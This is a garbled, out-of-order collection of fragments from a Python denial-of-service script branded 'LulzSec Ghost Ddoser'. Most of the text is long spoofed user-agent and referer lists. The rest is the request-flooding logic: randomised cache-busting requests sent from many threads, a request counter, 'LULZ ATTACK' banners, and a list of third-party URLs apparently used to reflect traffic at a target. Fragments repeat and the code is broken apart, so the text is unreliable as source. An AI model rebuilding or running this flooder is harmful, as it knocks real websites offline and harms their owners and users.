keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn')", "previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\" % (request_counter)", "Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)", "CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea", "Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0", "Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19", "<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0", "- http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve", "threads and counts requests class 
MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if (previous+500<request_counter)", "Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like", "search engine - obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at", "Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)')", "headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=')", "site for better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si;", "Android 3.2.1; en-gb; A501 Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U;", "headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') 
headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider", "; : `. // // // // ,' / ~~~`.______//____//____//____//_______,'~ // //~ //", "_/.-:'o | / ' | / , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' |", "http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase PROve x.0') headers_useragents.append('AnswerChase x.0')", "Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en))", "`:\\ \\ // `:`. ,' \\ /-._; | : : :: ,. .", "useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner", "bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds", "SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0;", "Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') 
headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch;", "gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)')", "headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog", "import threading import random import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0", "Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1;", "Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos", "'LulzSec Ghost Ddoser By V3I0p3r' print 'Script Priv8 Privada da LulzSec Ghost' print", "(Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x 
(+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1", "(MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1", "headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)')", "2.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;')", "(Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a", "Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note", "headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch", "PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') 
headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3)", "(www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence", "% (request_counter) previous=request_counter if flag==2: print \"\\n -lULZ Finish\" #execute if len(sys.argv) <", ": `.`.) _,' |;._:: | | | | `| : `' ,' `.", ",'_/.-/': : _..-'''/ / | \\ \\ _|/| \\ /-./_ \\; \\ \\,;'", "headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com')", "random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive')", "Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')", "Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0')", "e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except", "(PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows", 
"print \\ \"\"\" . _____|\\ _.--| LOL |: <____|.----|| .---''---, The ;..__..' _...", "headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real", "headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1", "Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)')", "NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52)", "< 2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8", "InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1')", "bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random ascii string def buildblock(size): 
out_str = ''", "Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet;", "InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727;", "BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0", "e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] '", "amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS", "sys.argv[1] if url.count(\"/\")==2: url = url + \"/\" m = re.search('http\\://([^/]*)/?.*', url) host", "headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML,", "'/') return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") 
bots.append(\"http://network-tools.com/default.asp?prog=network&host=\")", "2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux;", "headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de", "print 'LulzSec Ghost Ddoser By V3I0p3r' print 'Script Priv8 Privada da LulzSec Ghost'", "headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5 libwww/5.4.0') headers_useragents.append('amaya/11.2", "headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE')", "keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight", "| `| : `' ,' `. 
/ |`-:_ ; | | | :", "headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like", "http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux)", "SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 
4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0", "U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140", "Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0)", "random.randint(65, 90) out_str += chr(a) return(out_str) def usage(): print 'Pra usar python Lulz.py", ";`-._; __..--'; : : / ( ;|;-./_ _/.-:'o | / ' | /", "user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1;", "Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One')", "urllib2.HTTPError, e: #print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+]", ". ,' :: /`-._| | | || ' : `.`.) 
_,' |;._:: |", "3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;')", "headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def", "undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0", "10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64)", "10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible;", "while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\" % (request_counter) previous=request_counter", "(Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') 
headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA", "|: <____|.----|| .---''---, The ;..__..' _... Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': :", "e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def run(self):", "+http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info')", "(+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL')", "import random import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0", "set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError,", "XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1", "(KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)')", "STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print e.reason sys.exit()", "Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates a referer array def referer_list(): global headers_referers 
headers_referers.append('http://www.google.com/?q=')", "keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia", "(xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced", ": _..-'''/ / | \\ \\ _|/| \\ /-./_ \\; \\ \\,;' \\", "headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy", "at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon", "(http://gsitecrawler.com/)') headers_useragents.append('iTunes/9.1.1') headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2", "headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista", "PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/5.0 (X11; U;", "Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux", "Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 
(KHTML,", "Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android", "(KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like", "headers_useragents.append('Avant Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot", "indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)')", "headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1;", "|`-:_ ; | | | : \\ `--. 
) /|-._: : | \\", "(Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows", "Privada da LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1]", "fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3;", "' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http", "Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux;", "Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2;", "headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') 
headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=')", "threading import random import re #global params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0", "headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575') headers_useragents.append('W3C_Validator/1.555') headers_useragents.append('W3C_Validator/1.432.2.5') headers_useragents.append('W3C_Validator/1.432.2.22') headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1", "- Crawling your site for better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x')", "(www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') 